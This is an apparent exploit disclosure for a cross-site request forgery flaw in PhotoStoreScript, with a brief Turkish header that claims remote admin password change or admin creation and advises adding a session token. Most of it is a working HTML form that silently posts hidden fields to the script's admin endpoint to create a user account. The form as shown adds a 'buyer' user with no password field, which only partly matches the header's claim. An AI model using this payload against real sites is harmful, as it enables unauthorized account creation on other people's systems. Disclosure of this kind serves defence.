< ------------------- header data start ------------------- >

#############################################################

# Application Name : PhotoStoreScript

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir veya admin eklenebilir

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli veya eski sifre sorulmalidir.

# author : Bug Researchers | CWOmer

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<form method=post Enctype=multipart/form-data name=uploadform action=http://admin.photostorescript.com/admin/content/structure_document_add.php?id_parent=2&module_table=28&str=1>
<input type=hidden name=login style=width:150 value=’CWOmer’ >
<input type=hidden name=name style=width:350 value=’CWOmer’ >
<input type=hidden name=lastname style=width:350 value=’CWOmer’ >
<input type=hidden name=email style=width:150 value=’deneme@deneme’ >
<input type=hidden name=telephone style=width:150 value=’CWOmer’ >
<input type=hidden name=country style=width:150 value=’CWOmer’ >
<input type=hidden name=city style=width:350 value=’CWOmer’ >
<input type=hidden name=zipcode style=width:350 value=’CWOmer’ >
<select name=utype style=width:80 >
<option value=buyer >Buyer</option>
<input type=submit value=Add style=margin-top:10px>
</form>

< -- bug code end of -- >